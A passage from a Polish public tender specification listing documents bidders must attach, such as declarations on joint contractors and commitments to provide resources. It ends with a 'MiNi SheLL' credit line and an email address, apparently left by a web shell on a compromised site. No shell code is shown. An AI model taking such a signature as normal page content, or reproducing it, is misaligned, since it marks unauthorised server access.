udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (załącznik nr 6 do SWZ) – dotyczy również spółek cywilnych,<br/>f)	oświadczenie o spełnianiu warunków udziału w postępowaniu i braku podstaw do wykluczenia (załączniki nr 4 do SWZ), dotyczy również spółek cywilnych,<br/>g)	pisemne zobowiązanie podmiotu do udostępnienia niezbędnych zasobów<br/>do wykonania zamówienia (załącznik nr 7 do SWZ) – jeżeli dotyczy,<br/>h)	w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o którym mowa w ust. f) składa każdy z Wykonawców, dotyczy również spółek cywilnych.

Creat By MiNi SheLL
Email: jattceo@gmail.com